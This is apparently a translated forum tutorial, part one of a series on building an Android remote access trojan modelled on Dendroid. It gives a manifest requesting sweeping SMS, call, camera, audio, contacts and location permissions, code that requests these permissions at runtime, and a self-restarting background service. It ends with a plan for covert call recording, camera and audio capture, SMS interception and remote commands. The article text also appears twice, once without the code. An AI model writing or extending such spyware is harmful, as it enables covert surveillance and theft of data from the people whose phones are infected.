Contents of the article:
Hello and good evening to all readers. This is my first article on the topic of creating a RAT (or bot) for Android in Java, and in general, my first article.
The author of this article was inspired by an existing RAT for Android called Dendroid-HTTP-RAT (or BetterAndroidRat), but after many years, some of the functionality stopped working, and some even require permissions from the Android system for full operation. So the author thought a little and decided, why not write his own RAT having some of the ready-made functionality, which he can easily supplement with his own.
The project itself will consist of several parts - a server and a client. The client will be the RAT itself, installed on an Android smartphone, and the server will be our WEB interface (site) or a program for sending commands to the server (which we may write in future articles).
To write the server part we will need knowledge of PHP, HTML, CSS, MySQL and other things (well, in fact, most of the code will be provided). And for the client, oh what joy, only one language - Java.
I think we can finish with the introduction, since most probably already want to move on to the code itself, so let's go ahead.
2. Creating a project in Android Studio
Help.
I hope that those who want to write or have written applications for Android have already installed AndroidStudio (in theory, Eclipse would also work, but the author writes in AS, so please don't be angry if suddenly something I did didn't work out in the Eclipse environment), so let's start creating an empty project. Choose your name, choose the minimum SDK version 16 and the Java development language, click "Finish".
Let's move on.
2. Creating an application template and creating part of the future functionality
I think everyone would like their program to work on older versions of Android, so the first thing we will do is create a method for obtaining permissions. However, before that, let's look at the application manifest and write everything we need to work with. If you think that some methods are not needed, you can remove them (I really added more than required)
Well, we're done with the manifest, time to move on to the permissions method. We'll check the SDK version and if it's higher than 23 (somewhere around Android 5 or 6; the author is too lazy to check)
Alas and alack, but you will have to add the rest of the permissions yourself. I hope that this will not be too difficult.
Also in the future we will add another method for checking, which will re-call getting permissions in case of user's refusal (but that's later, so you don't have to read it).
Well, now let's write our method in the main function.
I hope no one has any questions about why I made a request via try (well, and if it did, I'll say it - so that the program wouldn't crash if there was an error and we could view it in debug mode).
So. We are done with the main part, now we can be sure that our application will work on all versions (but this is not certain) of Android (starting with the minimum version we specified when creating the project). Next, we will need to create a method for starting the service and the service itself.
We can proceed to the next stage. First, let's create a new Java file and call it MainService. Next, we need to add inheritance to our class and create a couple of methods. In order not to overload you too much, I'll give you the code right away. And yes, AndroidStudio should issue the necessary imports itself, so I don't specify them in the code.
We will also immediately create a function in MainService that will be called upon creation and make it so that it is in the thread.
All that's left is to create our stream and we can forget about our service for a while. So, we write the following.
For now, our service does nothing, it just restarts the service every 10 seconds. We will return to our service later, because it will receive commands, process them and send data to the server, but for now we can return to our main file MainActivity and create a function there to check the functionality of the service we just created.
Java:
Now all that remains is to check when the program starts.
4. Conclusion
And yes, initially the code may coincide in some places with the already mentioned Dendroid, but this is only the beginning, so I hope that it will be perceived adequately. In the future, I plan to make the following functionality:
I hope the article turned out interesting and not cumbersome. Write your wishes about what should be corrected, how best to approach the design of the article and what style of communication you would like to see further. If you liked it, then put a mark on the poll.
- Greetings
- Creating a Project in Android Studio
- Creating an application template and creating part of the future functionality
- Conclusion
Hello and good evening to all readers. This is my first article on the topic of creating a RAT (or bot) for Android in Java, and in general, my first article.
The author of this article was inspired by an existing RAT for Android called Dendroid-HTTP-RAT (or BetterAndroidRat), but after many years, some of the functionality stopped working, and some even require permissions from the Android system for full operation. So the author thought a little and decided, why not write his own RAT having some of the ready-made functionality, which he can easily supplement with his own.
The project itself will consist of several parts - a server and a client. The client will be the RAT itself, installed on an Android smartphone, and the server will be our WEB interface (site) or a program for sending commands to the server (which we may write in future articles).
To write the server part we will need knowledge of PHP, HTML, CSS, MySQL and other things (well, in fact, most of the code will be provided). And for the client, oh what joy, only one language - Java.
I think we can finish with the introduction, since most probably already want to move on to the code itself, so let's go ahead.
2. Creating a project in Android Studio
Help.
I hope that those who want to write or have written applications for Android have already installed AndroidStudio (in theory, Eclipse would also work, but the author writes in AS, so please don't be angry if suddenly something I did didn't work out in the Eclipse environment), so let's start creating an empty project. Choose your name, choose the minimum SDK version 16 and the Java development language, click "Finish".
2. Creating an application template and creating part of the future functionality
I think everyone would like their program to work on older versions of Android, so the first thing we will do is create a method for obtaining permissions. However, before that, let's look at the application manifest and write everything we need to work with. If you think that some methods are not needed, you can remove them (I really added more than required)
XML:
<uses-permission android:name="com.android.vending.BILLING" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.VIBRATE" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.BLUETOOTH" />
<uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
<uses-permission android:name="android.permission.READ_SYNC_SETTINGS" />
<uses-permission android:name="android.permission.NFC" />
<uses-permission android:name="android.permission.READ_CONTACTS" />
<uses-permission android:name="android.permission.TRANSMIT_IR" />
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.WRITE_CALL_LOG" />
<uses-permission android:name="android.permission.READ_CALL_LOG" />
<uses-permission android:name="android.permission.FLASHLIGHT" />
<uses-permission android:name="android.permission.CALL_PHONE" />
<uses-permission android:name="android.permission.GET_PACKAGE_SIZE" />
<uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT" />
<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />
<uses-permission android:name="android.permission.WRITE_CONTACTS" />
<uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS" />
Java:
public void checkPermission() {
if (Build.VERSION.SDK_INT >= 23) {
List<String> permissions = null;
if (checkSelfPermission(Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED) {
permissions = new ArrayList<>();
permissions.add(Manifest.permission.READ_PHONE_STATE);
}
if (checkSelfPermission(Manifest.permission.GET_ACCOUNTS) != PackageManager.PERMISSION_GRANTED) {
permissions = new ArrayList<>();
permissions.add(Manifest.permission.GET_ACCOUNTS);
}
//Тут нужно будет дописать остальные разрешения по такому типу
/*
if (checkSelfPermission(Manifest.permission.РАЗРЕШЕНИЕ) != PackageManager.PERMISSION_GRANTED) {
permissions = new ArrayList<>();
permissions.add(Manifest.permission.РАЗРЕШЕНИЕ);
}
*/
if (permissions != null) {
String[] permissionArray = new String[permissions.size()];
permissions.toArray(permissionArray);
requestPermissions(permissionArray, 0);
}
}
}Also in the future we will add another method for checking, which will re-call getting permissions in case of user's refusal (but that's later, so you don't have to read it).
Well, now let's write our method in the main function.
Java:
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
try {
checkPermission();
} catch (Exception e) {
e.printStackTrace();
}
}I hope no one has any questions about why I made a request via try (well, and if it did, I'll say it - so that the program wouldn't crash if there was an error and we could view it in debug mode).
So. We are done with the main part, now we can be sure that our application will work on all versions (but this is not certain) of Android (starting with the minimum version we specified when creating the project). Next, we will need to create a method for starting the service and the service itself.
We can proceed to the next stage. First, let's create a new Java file and call it MainService. Next, we need to add inheritance to our class and create a couple of methods. In order not to overload you too much, I'll give you the code right away. And yes, AndroidStudio should issue the necessary imports itself, so I don't specify them in the code.
Java:
public class MainService extends Service {
private final IBinder myBinder = new MyLocalBinder();
//Если вы выбрали другое название, то поменяйте MainService на свое
public class MyLocalBinder extends Binder {
MainService getService() {
return MainService.this;
}
}
@Override
public IBinder onBind(Intent intent) {
return myBinder;
}
}We will also immediately create a function in MainService that will be called upon creation and make it so that it is in the thread.
Java:
@Override
public void onCreate() {
super.onCreate();
obtainTask.start();
}All that's left is to create our stream and we can forget about our service for a while. So, we write the following.
Java:
Thread obtainTask = new Thread() {
@SuppressLint("Wakelock") @Override
public void run() {
Looper.prepare();
while (true) {
try {
Thread.sleep(10000);
} catch (Exception e) {
obtainTask.start();
}
}
}
};Java:
Java:
private boolean isMyServiceRunning() {
ActivityManager manager = (ActivityManager) getApplicationContext().getSystemService(Context.ACTIVITY_SERVICE);
for (RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {
if (MainService.class.getName().equals(service.service.getClassName())) { //вместо MainService название ранее созданного вами сервиса
return true;
}
}
return false;
}
Java:
if(!isMyServiceRunning()) {
startService(new Intent(getApplicationContext(), MainService.class)); //название MainService замените на свое
}4. Conclusion
And yes, initially the code may coincide in some places with the already mentioned Dendroid, but this is only the beginning, so I hope that it will be perceived adequately. In the future, I plan to make the following functionality:
- Receiving commands from the @feature website
- Receiving commands via Telegram bot
- Receiving commands via SMS
- Working with messages
- Receiving @feature messages
- Receive messages with a specific user
- Deleting a message
- Blocking messages
- Sending messages
- Working with calls
- Receiving calls @feature
- Receiving calls with a specific user
- Deleting calls
- Call blocking
- Calling a subscriber
- Call recording
- Working with the camera
- Filmed with @feature cameras
- Video shooting
- Sound recording
- Getting media (photos) @feature
- Access to Explorer (file system access)
- Getting information about the device (where would we be without it) @feature
- Smartphone control
- Volume
- Brightness
- Wallpaper
- Other
I hope the article turned out interesting and not cumbersome. Write your wishes about what should be corrected, how best to approach the design of the article and what style of communication you would like to see further. If you liked it, then put a mark on the poll.
